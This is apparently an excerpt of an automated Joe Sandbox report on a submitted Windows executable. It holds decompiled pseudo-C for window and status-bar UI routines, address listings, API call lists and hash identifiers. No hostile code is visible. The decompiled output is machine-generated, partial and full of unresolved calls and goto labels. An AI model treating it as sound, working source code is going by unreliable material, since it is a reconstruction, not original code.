                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														goto L40;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													__eflags = _t101 - 0xffffffff;
                                                                                                                                                                                                                                                                                          													if(_t101 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          														_t102 = E00102BE0(_t101, _t146);
                                                                                                                                                                                                                                                                                          														__eflags = _t102;
                                                                                                                                                                                                                                                                                          														if(_t102 != 0) {
                                                                                                                                                                                                                                                                                          															_push(_t136);
                                                                                                                                                                                                                                                                                          															E001059DB();
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														goto L39;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											L40:
                                                                                                                                                                                                                                                                                          											__eflags =  *(_t146 + 8);
                                                                                                                                                                                                                                                                                          											if( *(_t146 + 8) == 0) {
                                                                                                                                                                                                                                                                                          												E000FFF20(_t146);
                                                                                                                                                                                                                                                                                          												 *0x171994 = 0;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          									_t96 = _a4;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								 *[fs:0x0] = _v20;
                                                                                                                                                                                                                                                                                          								return _t96;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _t76 - _t116;
                                                                                                                                                                                                                                                                                          								if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                          									goto L26;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t126 = _t141[1];
                                                                                                                                                                                                                                                                                          									_t77 =  *((intOrPtr*)(_t141[1] + _t76 * 4));
                                                                                                                                                                                                                                                                                          									goto L17;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_push(0xc);
                                                                                                                                                                                                                                                                                          					_v8 = 1;
                                                                                                                                                                                                                                                                                          					_t105 = E001065FC(_t126, 0, SendMessageA, _t157);
                                                                                                                                                                                                                                                                                          					_t150 = _t150 + 4;
                                                                                                                                                                                                                                                                                          					if(_t105 == 0) {
                                                                                                                                                                                                                                                                                          						 *0x171994 = 0;
                                                                                                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						 *_t105 = 0;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t105 + 4)) = 0;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t105 + 8)) = 0;
                                                                                                                                                                                                                                                                                          						 *0x171994 = _t105;
                                                                                                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t159 =  *0x171994; // 0x0
                                                                                                                                                                                                                                                                                          					if(_t159 == 0) {
                                                                                                                                                                                                                                                                                          						L24:
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          						 *(_t108 + 0x85) =  *(_t108 + 0x85) ^ (GetWindowLongA( *(_t108 + 4), 0xffffffec) >> 0x00000016 << 0x00000006 ^  *(_t108 + 0x85)) & 0x00000040;
                                                                                                                                                                                                                                                                                          						 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          						return _v28;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L44:
                                                                                                                                                                                                                                                                                          			}















































                                                                                                                                                                                                                                                                                          0x000fdc93
                                                                                                                                                                                                                                                                                          0x000fdc95
                                                                                                                                                                                                                                                                                          0x000fdca0
                                                                                                                                                                                                                                                                                          0x000fdca1
                                                                                                                                                                                                                                                                                          0x000fdca7
                                                                                                                                                                                                                                                                                          0x000fdcae
                                                                                                                                                                                                                                                                                          0x000fdcb2
                                                                                                                                                                                                                                                                                          0x000fdcb8
                                                                                                                                                                                                                                                                                          0x000fdcbb
                                                                                                                                                                                                                                                                                          0x000fdcd4
                                                                                                                                                                                                                                                                                          0x000fdcd7
                                                                                                                                                                                                                                                                                          0x000fdcdc
                                                                                                                                                                                                                                                                                          0x000fdce6
                                                                                                                                                                                                                                                                                          0x000fdce8
                                                                                                                                                                                                                                                                                          0x000fdceb
                                                                                                                                                                                                                                                                                          0x000fdcef
                                                                                                                                                                                                                                                                                          0x000fdcf2
                                                                                                                                                                                                                                                                                          0x000fdcf4
                                                                                                                                                                                                                                                                                          0x000fdcf6
                                                                                                                                                                                                                                                                                          0x000fdcfd
                                                                                                                                                                                                                                                                                          0x000fdd16
                                                                                                                                                                                                                                                                                          0x000fdd23
                                                                                                                                                                                                                                                                                          0x000fdd25
                                                                                                                                                                                                                                                                                          0x000fdd31
                                                                                                                                                                                                                                                                                          0x000fdd34
                                                                                                                                                                                                                                                                                          0x000fdd3a
                                                                                                                                                                                                                                                                                          0x000fdd3e
                                                                                                                                                                                                                                                                                          0x000fdd44
                                                                                                                                                                                                                                                                                          0x000fdd94
                                                                                                                                                                                                                                                                                          0x000fdd94
                                                                                                                                                                                                                                                                                          0x000fdd9a
                                                                                                                                                                                                                                                                                          0x000fdda0
                                                                                                                                                                                                                                                                                          0x000fdda3
                                                                                                                                                                                                                                                                                          0x000fdda5
                                                                                                                                                                                                                                                                                          0x000fdda7
                                                                                                                                                                                                                                                                                          0x000fddac
                                                                                                                                                                                                                                                                                          0x000fddc5
                                                                                                                                                                                                                                                                                          0x000fddc5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fddae
                                                                                                                                                                                                                                                                                          0x000fddae
                                                                                                                                                                                                                                                                                          0x000fddb0
                                                                                                                                                                                                                                                                                          0x000fddb4
                                                                                                                                                                                                                                                                                          0x000fddb5
                                                                                                                                                                                                                                                                                          0x000fddba
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fddbc
                                                                                                                                                                                                                                                                                          0x000fddbc
                                                                                                                                                                                                                                                                                          0x000fdde1
                                                                                                                                                                                                                                                                                          0x000fdde1
                                                                                                                                                                                                                                                                                          0x000fdde4
                                                                                                                                                                                                                                                                                          0x000fdde6
                                                                                                                                                                                                                                                                                          0x000fde9e
                                                                                                                                                                                                                                                                                          0x000fddec
                                                                                                                                                                                                                                                                                          0x000fddec
                                                                                                                                                                                                                                                                                          0x000fddee
                                                                                                                                                                                                                                                                                          0x000fddf2
                                                                                                                                                                                                                                                                                          0x000fddfc
                                                                                                                                                                                                                                                                                          0x000fde14
                                                                                                                                                                                                                                                                                          0x000fde16
                                                                                                                                                                                                                                                                                          0x000fddfe
                                                                                                                                                                                                                                                                                          0x000fddfe
                                                                                                                                                                                                                                                                                          0x000fde00
                                                                                                                                                                                                                                                                                          0x000fde06
                                                                                                                                                                                                                                                                                          0x000fde0d
                                                                                                                                                                                                                                                                                          0x000fde0d
                                                                                                                                                                                                                                                                                          0x000fde38
                                                                                                                                                                                                                                                                                          0x000fde40
                                                                                                                                                                                                                                                                                          0x000fde42
                                                                                                                                                                                                                                                                                          0x000fde44
                                                                                                                                                                                                                                                                                          0x000fde4d
                                                                                                                                                                                                                                                                                          0x000fde50
                                                                                                                                                                                                                                                                                          0x000fde57
                                                                                                                                                                                                                                                                                          0x000fde57
                                                                                                                                                                                                                                                                                          0x000fde44
                                                                                                                                                                                                                                                                                          0x000fde40
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdde6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fddba
                                                                                                                                                                                                                                                                                          0x000fddc0
                                                                                                                                                                                                                                                                                          0x000fddc3
                                                                                                                                                                                                                                                                                          0x000fddc9
                                                                                                                                                                                                                                                                                          0x000fddcb
                                                                                                                                                                                                                                                                                          0x000fdea3
                                                                                                                                                                                                                                                                                          0x000fdeae
                                                                                                                                                                                                                                                                                          0x000fdeb4
                                                                                                                                                                                                                                                                                          0x000fdeb5
                                                                                                                                                                                                                                                                                          0x000fdeb6
                                                                                                                                                                                                                                                                                          0x000fdeb7
                                                                                                                                                                                                                                                                                          0x000fdeb8
                                                                                                                                                                                                                                                                                          0x000fdeb9
                                                                                                                                                                                                                                                                                          0x000fdeba
                                                                                                                                                                                                                                                                                          0x000fdebb
                                                                                                                                                                                                                                                                                          0x000fdebc
                                                                                                                                                                                                                                                                                          0x000fdebd
                                                                                                                                                                                                                                                                                          0x000fdebe
                                                                                                                                                                                                                                                                                          0x000fdebf
                                                                                                                                                                                                                                                                                          0x000fdec3
                                                                                                                                                                                                                                                                                          0x000fdec5
                                                                                                                                                                                                                                                                                          0x000fded0
                                                                                                                                                                                                                                                                                          0x000fded4
                                                                                                                                                                                                                                                                                          0x000fded5
                                                                                                                                                                                                                                                                                          0x000fded6
                                                                                                                                                                                                                                                                                          0x000fded7
                                                                                                                                                                                                                                                                                          0x000fdede
                                                                                                                                                                                                                                                                                          0x000fdee2
                                                                                                                                                                                                                                                                                          0x000fdee8
                                                                                                                                                                                                                                                                                          0x000fdef9
                                                                                                                                                                                                                                                                                          0x000fdeff
                                                                                                                                                                                                                                                                                          0x000fdf06
                                                                                                                                                                                                                                                                                          0x000fdf09
                                                                                                                                                                                                                                                                                          0x000fdf0f
                                                                                                                                                                                                                                                                                          0x000fdf1b
                                                                                                                                                                                                                                                                                          0x000fdf22
                                                                                                                                                                                                                                                                                          0x000fdf28
                                                                                                                                                                                                                                                                                          0x000fdf2f
                                                                                                                                                                                                                                                                                          0x000fdf33
                                                                                                                                                                                                                                                                                          0x000fdf3b
                                                                                                                                                                                                                                                                                          0x000fdf40
                                                                                                                                                                                                                                                                                          0x000fdf48
                                                                                                                                                                                                                                                                                          0x000fdf4a
                                                                                                                                                                                                                                                                                          0x000fdf4c
                                                                                                                                                                                                                                                                                          0x000fdf4e
                                                                                                                                                                                                                                                                                          0x000fdf4e
                                                                                                                                                                                                                                                                                          0x000fdf4e
                                                                                                                                                                                                                                                                                          0x000fdf51
                                                                                                                                                                                                                                                                                          0x000fdf95
                                                                                                                                                                                                                                                                                          0x000fdf95
                                                                                                                                                                                                                                                                                          0x000fdf53
                                                                                                                                                                                                                                                                                          0x000fdf56
                                                                                                                                                                                                                                                                                          0x000fdf5c
                                                                                                                                                                                                                                                                                          0x000fdf62
                                                                                                                                                                                                                                                                                          0x000fdf65
                                                                                                                                                                                                                                                                                          0x000fdf67
                                                                                                                                                                                                                                                                                          0x000fdf69
                                                                                                                                                                                                                                                                                          0x000fdf6b
                                                                                                                                                                                                                                                                                          0x000fdf70
                                                                                                                                                                                                                                                                                          0x000fdf70
                                                                                                                                                                                                                                                                                          0x000fdf72
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf74
                                                                                                                                                                                                                                                                                          0x000fdf75
                                                                                                                                                                                                                                                                                          0x000fdf78
                                                                                                                                                                                                                                                                                          0x000fdf7a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf7c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf7a
                                                                                                                                                                                                                                                                                          0x000fdf7e
                                                                                                                                                                                                                                                                                          0x000fdf81
                                                                                                                                                                                                                                                                                          0x000fdf83
                                                                                                                                                                                                                                                                                          0x000fdf88
                                                                                                                                                                                                                                                                                          0x000fdf8a
                                                                                                                                                                                                                                                                                          0x000fdf8c
                                                                                                                                                                                                                                                                                          0x000fdf8d
                                                                                                                                                                                                                                                                                          0x000fdf92
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf8a
                                                                                                                                                                                                                                                                                          0x000fdf81
                                                                                                                                                                                                                                                                                          0x000fdf69
                                                                                                                                                                                                                                                                                          0x000fdf9b
                                                                                                                                                                                                                                                                                          0x000fdf9b
                                                                                                                                                                                                                                                                                          0x000fdf9f
                                                                                                                                                                                                                                                                                          0x000fdfa1
                                                                                                                                                                                                                                                                                          0x000fdfa6
                                                                                                                                                                                                                                                                                          0x000fdfa6
                                                                                                                                                                                                                                                                                          0x000fdf9f
                                                                                                                                                                                                                                                                                          0x000fdf4c
                                                                                                                                                                                                                                                                                          0x000fdfb5
                                                                                                                                                                                                                                                                                          0x000fdfbb
                                                                                                                                                                                                                                                                                          0x000fdfbb
                                                                                                                                                                                                                                                                                          0x000fdfc1
                                                                                                                                                                                                                                                                                          0x000fdfcf
                                                                                                                                                                                                                                                                                          0x000fddd1
                                                                                                                                                                                                                                                                                          0x000fddd1
                                                                                                                                                                                                                                                                                          0x000fddd3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fddd9
                                                                                                                                                                                                                                                                                          0x000fddd9
                                                                                                                                                                                                                                                                                          0x000fdddf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdddf
                                                                                                                                                                                                                                                                                          0x000fddd3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fddc3
                                                                                                                                                                                                                                                                                          0x000fdd46
                                                                                                                                                                                                                                                                                          0x000fdd46
                                                                                                                                                                                                                                                                                          0x000fdd48
                                                                                                                                                                                                                                                                                          0x000fdd4c
                                                                                                                                                                                                                                                                                          0x000fdd51
                                                                                                                                                                                                                                                                                          0x000fdd56
                                                                                                                                                                                                                                                                                          0x000fdd6c
                                                                                                                                                                                                                                                                                          0x000fdd71
                                                                                                                                                                                                                                                                                          0x000fdd58
                                                                                                                                                                                                                                                                                          0x000fdd58
                                                                                                                                                                                                                                                                                          0x000fdd5a
                                                                                                                                                                                                                                                                                          0x000fdd5d
                                                                                                                                                                                                                                                                                          0x000fdd60
                                                                                                                                                                                                                                                                                          0x000fdd65
                                                                                                                                                                                                                                                                                          0x000fdd65
                                                                                                                                                                                                                                                                                          0x000fdd88
                                                                                                                                                                                                                                                                                          0x000fdd8e
                                                                                                                                                                                                                                                                                          0x000fde5c
                                                                                                                                                                                                                                                                                          0x000fde61
                                                                                                                                                                                                                                                                                          0x000fde81
                                                                                                                                                                                                                                                                                          0x000fde8d
                                                                                                                                                                                                                                                                                          0x000fde9b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdd8e
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CallWindowProcA.USER32 ref: 000FDCCC
                                                                                                                                                                                                                                                                                            • Part of subcall function 001011F0: _memset.LIBCMT ref: 00101221
                                                                                                                                                                                                                                                                                            • Part of subcall function 001011F0: SystemParametersInfoA.USER32(00000029,00000154,00000154,00000000), ref: 00101238
                                                                                                                                                                                                                                                                                            • Part of subcall function 001011F0: _memset.LIBCMT ref: 00101250
                                                                                                                                                                                                                                                                                            • Part of subcall function 001011F0: GetObjectA.GDI32(?,0000003C,?), ref: 00101269
                                                                                                                                                                                                                                                                                            • Part of subcall function 001011F0: lstrcmpA.KERNEL32(?,?,?,?,?,?,?,?), ref: 00101315
                                                                                                                                                                                                                                                                                            • Part of subcall function 001011F0: CreateFontIndirectA.GDI32(?), ref: 00101326
                                                                                                                                                                                                                                                                                            • Part of subcall function 001011F0: DeleteObject.GDI32(?), ref: 00101341
                                                                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 000FDCE6
                                                                                                                                                                                                                                                                                          • GetParent.USER32(00000000), ref: 000FDCEB
                                                                                                                                                                                                                                                                                          • GetParent.USER32(00000000), ref: 000FDCF4
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000041E,00000014,00000000), ref: 000FDD16
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000430,00000000,00000000), ref: 000FDD23
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68), ref: 000FDD34
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000FDD94
                                                                                                                                                                                                                                                                                          • SetWindowsHookExA.USER32 ref: 000FDE38
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68), ref: 000FDE61
                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 000FDE6D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Parent$CriticalMessageObjectSectionSendWindow_memset$CallCreateCurrentDeleteEnterFontHookIndirectInfoLeaveLongParametersProcSystemThreadWindowslstrcmp
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2439703492-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7a7038727d2904f94bd3e245e3058f81923f70bce4388a2868afcba74f5accb4
                                                                                                                                                                                                                                                                                          • Instruction ID: d09520bf94f293343ead0d157aa48b35cd56170df8360086ac0d6bba74389c45
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a7038727d2904f94bd3e245e3058f81923f70bce4388a2868afcba74f5accb4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F51C271A00209EFDB11DF68DD41BBA7BF9EB98714F14816AEA09DB681D7B0D840DB60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                                                                                                          			E000FAA10(void* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				char _v155;
                                                                                                                                                                                                                                                                                          				char _v156;
                                                                                                                                                                                                                                                                                          				intOrPtr _v160;
                                                                                                                                                                                                                                                                                          				intOrPtr _v164;
                                                                                                                                                                                                                                                                                          				void* _v168;
                                                                                                                                                                                                                                                                                          				void* _v688;
                                                                                                                                                                                                                                                                                          				char _v692;
                                                                                                                                                                                                                                                                                          				intOrPtr _v696;
                                                                                                                                                                                                                                                                                          				void* _v700;
                                                                                                                                                                                                                                                                                          				struct tagSIZE _v708;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v712;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v720;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                                                                                                          				signed int _t78;
                                                                                                                                                                                                                                                                                          				long _t86;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t88;
                                                                                                                                                                                                                                                                                          				void* _t92;
                                                                                                                                                                                                                                                                                          				int _t98;
                                                                                                                                                                                                                                                                                          				int _t101;
                                                                                                                                                                                                                                                                                          				intOrPtr _t104;
                                                                                                                                                                                                                                                                                          				long _t105;
                                                                                                                                                                                                                                                                                          				void* _t112;
                                                                                                                                                                                                                                                                                          				void* _t113;
                                                                                                                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                                                                                                                          				void* _t146;
                                                                                                                                                                                                                                                                                          				void* _t147;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t148;
                                                                                                                                                                                                                                                                                          				signed int _t149;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t150;
                                                                                                                                                                                                                                                                                          				intOrPtr _t152;
                                                                                                                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                                                                                                                          				void* _t154;
                                                                                                                                                                                                                                                                                          				long _t155;
                                                                                                                                                                                                                                                                                          				signed int _t156;
                                                                                                                                                                                                                                                                                          				void* _t157;
                                                                                                                                                                                                                                                                                          				void* _t161;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t161 = __eflags;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F31B);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t77 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t78 = _t77 ^ _t156;
                                                                                                                                                                                                                                                                                          				_v24 = _t78;
                                                                                                                                                                                                                                                                                          				_push(_t146);
                                                                                                                                                                                                                                                                                          				_push(_t78);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_v20 = _t157 - 0x2c4;
                                                                                                                                                                                                                                                                                          				_t112 = __ecx;
                                                                                                                                                                                                                                                                                          				_t152 = __edx;
                                                                                                                                                                                                                                                                                          				_push( *((intOrPtr*)(__ecx + 0x28)));
                                                                                                                                                                                                                                                                                          				_v700 = __ecx;
                                                                                                                                                                                                                                                                                          				_v696 = __edx;
                                                                                                                                                                                                                                                                                          				 *(__ecx + 0x24) = 3;
                                                                                                                                                                                                                                                                                          				E001062C2();
                                                                                                                                                                                                                                                                                          				 *(_t112 + 0x28) = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_t135 = 0xc >> 0x20;
                                                                                                                                                                                                                                                                                          				_push( ~(0 | _t161 > 0x00000000) | 0xc);
                                                                                                                                                                                                                                                                                          				 *(_t112 + 0x28) = E00105DD7(0xc >> 0x20, _t146, __edx, _t161);
                                                                                                                                                                                                                                                                                          				_t86 =  *(_t112 + 0x28);
                                                                                                                                                                                                                                                                                          				if(_t86 != 0) {
                                                                                                                                                                                                                                                                                          					_v692 =  &_v688;
                                                                                                                                                                                                                                                                                          					 *_t86 =  *((intOrPtr*)(__edx));
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t86 + 4)) =  *((intOrPtr*)(__edx + 4));
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t86 + 8)) =  *((intOrPtr*)(__edx + 8));
                                                                                                                                                                                                                                                                                          					_t88 =  *(_t112 + 4);
                                                                                                                                                                                                                                                                                          					_v712 = _t88;
                                                                                                                                                                                                                                                                                          					_t148 = GetDC(_t88);
                                                                                                                                                                                                                                                                                          					_v720 = _t148;
                                                                                                                                                                                                                                                                                          					_t92 = SelectObject(_t148, SendMessageA( *(_t112 + 4), 0x31, 0, 0));
                                                                                                                                                                                                                                                                                          					_t149 = 0;
                                                                                                                                                                                                                                                                                          					_v700 = _t92;
                                                                                                                                                                                                                                                                                          					_v168 = 0;
                                                                                                                                                                                                                                                                                          					_v164 = 0;
                                                                                                                                                                                                                                                                                          					_v160 = 0;
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t112 + 4), 0x407, 0,  &_v168);
                                                                                                                                                                                                                                                                                          					_v156 = 0;
                                                                                                                                                                                                                                                                                          					E00106820( &_v155, 0, 0x7f);
                                                                                                                                                                                                                                                                                          					_v708.cx = 0;
                                                                                                                                                                                                                                                                                          					_v708.cy = 0;
                                                                                                                                                                                                                                                                                          					_v696 = _v168;
                                                                                                                                                                                                                                                                                          					_t154 = _t152 -  &_v688;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						_t98 =  *(_t156 + _t154 + _t149 * 4 - 0x2ac);
                                                                                                                                                                                                                                                                                          						if(_t98 != 0) {
                                                                                                                                                                                                                                                                                          							LoadStringA( *0x170c0c, _t98,  &_v156, 0x80);
                                                                                                                                                                                                                                                                                          							_t101 = lstrlenA( &_v156);
                                                                                                                                                                                                                                                                                          							__eflags = _t101 - 0xffffffff;
                                                                                                                                                                                                                                                                                          							if(_t101 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          								_t101 = lstrlenA( &_v156);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							GetTextExtentPoint32A(_v720,  &_v156, _t101,  &_v708);
                                                                                                                                                                                                                                                                                          							_t143 = _v160 + _v696;
                                                                                                                                                                                                                                                                                          							__eflags = _t143;
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t156 + _t149 * 4 - 0x2ac)) = _t143 + _v708.cx + 6;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t156 + _t149 * 4 - 0x2ac)) = 0x3fffffff;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t104 =  *((intOrPtr*)(_t156 + _t149 * 4 - 0x2ac));
                                                                                                                                                                                                                                                                                          						_t149 = _t149 + 1;
                                                                                                                                                                                                                                                                                          						_v696 = _t104;
                                                                                                                                                                                                                                                                                          					} while (_t149 < 3);
                                                                                                                                                                                                                                                                                          					_t105 = SendMessageA( *(_t112 + 4), 0x404, 3,  &_v688);
                                                                                                                                                                                                                                                                                          					_t150 = _v720;
                                                                                                                                                                                                                                                                                          					_t155 = _t105;
                                                                                                                                                                                                                                                                                          					SelectObject(_t150, _v700);
                                                                                                                                                                                                                                                                                          					ReleaseDC(_v712, _t150);
                                                                                                                                                                                                                                                                                          					_t135 =  &_v688;
                                                                                                                                                                                                                                                                                          					if(_v692 !=  &_v688) {
                                                                                                                                                                                                                                                                                          						E000FD040( &_v692);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t86 = _t155;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				_pop(_t147);
                                                                                                                                                                                                                                                                                          				_pop(_t153);
                                                                                                                                                                                                                                                                                          				_pop(_t113);
                                                                                                                                                                                                                                                                                          				return E001059E6(_t86, _t113, _v24 ^ _t156, _t135, _t147, _t153);
                                                                                                                                                                                                                                                                                          			}














































                                                                                                                                                                                                                                                                                          0x000faa10
                                                                                                                                                                                                                                                                                          0x000faa13
                                                                                                                                                                                                                                                                                          0x000faa15
                                                                                                                                                                                                                                                                                          0x000faa20
                                                                                                                                                                                                                                                                                          0x000faa27
                                                                                                                                                                                                                                                                                          0x000faa2c
                                                                                                                                                                                                                                                                                          0x000faa2e
                                                                                                                                                                                                                                                                                          0x000faa33
                                                                                                                                                                                                                                                                                          0x000faa34
                                                                                                                                                                                                                                                                                          0x000faa38
                                                                                                                                                                                                                                                                                          0x000faa3e
                                                                                                                                                                                                                                                                                          0x000faa41
                                                                                                                                                                                                                                                                                          0x000faa46
                                                                                                                                                                                                                                                                                          0x000faa48
                                                                                                                                                                                                                                                                                          0x000faa49
                                                                                                                                                                                                                                                                                          0x000faa4f
                                                                                                                                                                                                                                                                                          0x000faa55
                                                                                                                                                                                                                                                                                          0x000faa5c
                                                                                                                                                                                                                                                                                          0x000faa63
                                                                                                                                                                                                                                                                                          0x000faa66
                                                                                                                                                                                                                                                                                          0x000faa75
                                                                                                                                                                                                                                                                                          0x000faa7e
                                                                                                                                                                                                                                                                                          0x000faa87
                                                                                                                                                                                                                                                                                          0x000faa9e
                                                                                                                                                                                                                                                                                          0x000faaa3
                                                                                                                                                                                                                                                                                          0x000faab1
                                                                                                                                                                                                                                                                                          0x000faab7
                                                                                                                                                                                                                                                                                          0x000faabc
                                                                                                                                                                                                                                                                                          0x000faac2
                                                                                                                                                                                                                                                                                          0x000faac5
                                                                                                                                                                                                                                                                                          0x000faac9
                                                                                                                                                                                                                                                                                          0x000faad9
                                                                                                                                                                                                                                                                                          0x000faae1
                                                                                                                                                                                                                                                                                          0x000faaef
                                                                                                                                                                                                                                                                                          0x000faaff
                                                                                                                                                                                                                                                                                          0x000fab02
